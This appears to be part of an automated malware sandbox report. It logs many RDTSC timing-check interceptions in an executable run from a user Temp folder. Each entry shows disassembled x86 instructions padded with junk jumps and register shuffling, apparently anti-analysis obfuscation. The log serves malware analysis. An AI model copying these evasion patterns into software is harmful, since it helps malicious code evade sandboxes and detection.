                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40501 second address: 4B40593 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD88EC86370h 0x0000000f pushad 0x00000010 call 00007FD81C88825Eh 0x00000015 call 00007FD81C888262h 0x0000001a pop ecx 0x0000001b pop ebx 0x0000001c mov ch, E6h 0x0000001e popad 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FD81C888264h 0x0000002b sub esi, 60E27CD8h 0x00000031 jmp 00007FD81C88825Bh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FD81C888268h 0x0000003d sbb ah, 00000038h 0x00000040 jmp 00007FD81C88825Bh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40593 second address: 4B405C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81D0C842Fh 0x00000009 xor ah, FFFFFFFEh 0x0000000c jmp 00007FD81D0C8439h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B405C5 second address: 4B405E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81C888263h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B405E4 second address: 4B40657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007FD81D0C842Eh 0x00000014 jne 00007FD88F4C6499h 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e pushfd 0x0000001f jmp 00007FD81D0C842Ah 0x00000024 and si, 50B8h 0x00000029 jmp 00007FD81D0C842Bh 0x0000002e popfd 0x0000002f popad 0x00000030 test byte ptr [esi+48h], 00000001h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD81D0C8435h 0x0000003b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40657 second address: 4B406C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888267h 0x00000009 sub ch, FFFFFFDEh 0x0000000c jmp 00007FD81C888269h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD81C888260h 0x00000018 add eax, 22BC0FD8h 0x0000001e jmp 00007FD81C88825Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 jne 00007FD88EC86242h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B406C0 second address: 4B406C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 23h 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B700CB second address: 4B700D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B700D1 second address: 4B700D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B700D7 second address: 4B70154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov esi, 6B0EFC1Dh 0x00000014 mov dx, si 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FD81C888261h 0x00000022 sub esi, 17A3C166h 0x00000028 jmp 00007FD81C888261h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FD81C888260h 0x00000034 sub eax, 716CD908h 0x0000003a jmp 00007FD81C88825Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70154 second address: 4B70173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD81D0C842Fh 0x00000008 pop esi 0x00000009 mov esi, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70173 second address: 4B70177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70177 second address: 4B7017D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7017D second address: 4B70183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70183 second address: 4B70187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70187 second address: 4B701E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD81C88825Ah 0x00000010 adc si, CDC8h 0x00000015 jmp 00007FD81C88825Bh 0x0000001a popfd 0x0000001b mov cx, F73Fh 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 jmp 00007FD81C888262h 0x00000026 push eax 0x00000027 jmp 00007FD81C88825Bh 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 push eax 0x00000032 mov dx, 5522h 0x00000036 pop ebx 0x00000037 popad 0x00000038 mov esi, dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov si, bx 0x00000041 mov eax, ebx 0x00000043 popad 0x00000044 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B701E9 second address: 4B701EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B701EF second address: 4B701F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B701F3 second address: 4B7023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c mov ax, 21EFh 0x00000010 pop ecx 0x00000011 mov cx, bx 0x00000014 popad 0x00000015 test esi, esi 0x00000017 pushad 0x00000018 jmp 00007FD81D0C842Dh 0x0000001d popad 0x0000001e je 00007FD88F48E59Bh 0x00000024 jmp 00007FD81D0C842Dh 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push edx 0x00000034 pop ecx 0x00000035 movsx ebx, cx 0x00000038 popad 0x00000039 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7023C second address: 4B70242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70242 second address: 4B70260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C8432h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70260 second address: 4B70266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70266 second address: 4B7026A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7026A second address: 4B702F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD88EC4E387h 0x0000000e pushad 0x0000000f call 00007FD81C88825Fh 0x00000014 push esi 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007FD81C888265h 0x0000001d or cx, CF26h 0x00000022 jmp 00007FD81C888261h 0x00000027 popfd 0x00000028 popad 0x00000029 test byte ptr [76FC6968h], 00000002h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FD81C888263h 0x00000039 xor ax, 725Eh 0x0000003e jmp 00007FD81C888269h 0x00000043 popfd 0x00000044 mov ah, E3h 0x00000046 popad 0x00000047 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B702F9 second address: 4B702FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B702FF second address: 4B70303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70303 second address: 4B7033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD88F48E4D1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD81D0C842Dh 0x00000017 and cl, 00000046h 0x0000001a jmp 00007FD81D0C8431h 0x0000001f popfd 0x00000020 movzx eax, di 0x00000023 popad 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7033B second address: 4B70341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70341 second address: 4B7036B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FD81D0C8430h 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD81D0C842Ah 0x0000001a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7036B second address: 4B70371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70371 second address: 4B70376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70376 second address: 4B7037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7037C second address: 4B703BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 call 00007FD81D0C842Fh 0x0000000e push eax 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 mov ax, di 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD81D0C842Dh 0x0000001d jmp 00007FD81D0C842Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B703BB second address: 4B703BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B703BF second address: 4B703D8 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 1CABh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C842Dh 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7049F second address: 4B704A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B704A5 second address: 4B704A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B704A9 second address: 4B704F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007FD81C888266h 0x00000011 pop ebx 0x00000012 jmp 00007FD81C888260h 0x00000017 mov esp, ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007FD81C88825Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B704F4 second address: 4B7050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 call 00007FD81D0C842Eh 0x0000000c pop ecx 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60244 second address: 4B6024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B6024A second address: 4B6024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B6024E second address: 4B60277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD81C88825Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dl, cl 0x00000012 pushad 0x00000013 mov ecx, edx 0x00000015 mov eax, edx 0x00000017 popad 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ah, dl 0x00000020 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B50E98 second address: 4B50E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B50E9E second address: 4B50EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FD81C888269h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FD81C88825Eh 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FD81C88825Dh 0x00000020 mov bl, cl 0x00000022 popad 0x00000023 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B50EE6 second address: 4B50EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0D23 second address: 4BD0DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888264h 0x00000009 xor eax, 2200C578h 0x0000000f jmp 00007FD81C88825Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD81C888268h 0x0000001b add ecx, 398C5FD8h 0x00000021 jmp 00007FD81C88825Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebp 0x0000002b jmp 00007FD81C888266h 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007FD81C888267h 0x0000003a or ax, F7FEh 0x0000003f jmp 00007FD81C888269h 0x00000044 popfd 0x00000045 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0DCD second address: 4BD0E25 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD81D0C8430h 0x00000008 add si, 4EF8h 0x0000000d jmp 00007FD81D0C842Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FD81D0C8438h 0x0000001b and cx, A958h 0x00000020 jmp 00007FD81D0C842Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b movzx eax, bx 0x0000002e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0E25 second address: 4BD0E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FD81C88825Dh 0x0000000b jmp 00007FD81C888260h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD81C88825Ch 0x0000001b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0E89 second address: 4BC0E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0E8D second address: 4BC0EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888260h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0EA1 second address: 4BC0EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FD81D0C842Dh 0x0000000c add esi, 45E1C366h 0x00000012 jmp 00007FD81D0C8431h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bh, 0Dh 0x00000021 mov dx, cx 0x00000024 popad 0x00000025 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0EDA second address: 4BC0EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dh, CEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD81C888260h 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0EF8 second address: 4BC0F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD81D0C8436h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edi, 54A87FE0h 0x00000019 popad 0x0000001a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0F29 second address: 4BC0F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0F2F second address: 4BC0F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0F53 second address: 4BC0F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD03CB second address: 4BD03D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD03D1 second address: 4BD03FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e movsx edi, cx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD81C888260h 0x0000001a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD03FD second address: 4BD042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD81D0C8436h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ecx 0x00000016 mov esi, edx 0x00000018 popad 0x00000019 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD042D second address: 4BD0442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81C888261h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD0442 second address: 4BD047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007FD81D0C842Dh 0x00000010 push dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov esi, 57EBE9F3h 0x00000019 movzx eax, di 0x0000001c popad 0x0000001d push FC8F4248h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD81D0C842Ah 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | RDTSC instruction interceptor: First address: 4BD047A second address: 4BD0489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
